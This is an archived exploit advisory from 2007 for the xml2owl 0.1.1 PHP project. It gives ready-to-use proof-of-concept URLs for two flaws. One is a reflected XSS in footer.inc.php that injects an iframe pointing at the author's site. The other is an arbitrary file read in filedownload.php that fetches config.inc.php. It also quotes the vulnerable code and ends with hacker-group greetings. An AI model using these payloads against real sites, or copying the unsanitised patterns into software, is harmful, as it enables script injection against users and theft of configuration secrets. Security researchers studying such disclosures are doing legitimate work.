xml2owl 0.1.1 (File Disclosure-XSS) Multiple Remote Vulnerabilities

2007-12-28 00:00:00

* removed from database because of dupage *

http://milw0rm.com/exploits/4729

/str0ke

###################################################################################################################
# xml2owl 0.1.1 Multiple Remote Vulnerability #
###################################################################################################################
# #
# 1. XSS #
# 2. Remote File Disclosure #
# #
###################################################################################################################
# #
# 1. XSS #
# #
# Code: (footer.inc.php?actualHint=xss) #
# <p> #
# <b>Hint:</b> <?=$actualHint?> #
# </p> #
# #
# P.O.C: #
# http://xml2owl.sourceforge.net/footer.inc.php?actualHint=%3Ciframe%20src=http://zerofool2005.isgreat.org%20width=100%%20height%20=%20300%%3E%3Cb%3E
# #
###################################################################################################################
# #
# 2. Remote File Disclosure #
# #
# Code: (filedownload.php?file=file) #
# #
# $file = $_REQUEST['file']; #
# #
# header("Content-type: text/xml"); #
# header("Content-Disposition: attachment; filename=" . basename($file)); #
# #
# readfile($file); #
# #
# P.O.C: #
# http://xml2owl.sourceforge.net/filedownload.php?file=config.inc.php #
# #
###################################################################################################################
# #
# Greetz From zerofool2005 #
# Shoutz To: #
# [X]treme, dentrino, Tooget, atomiku #
# #
# irc.atomirc.net #lobby #
# http://zerofool2005.isgreat.org #
# #
###################################################################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.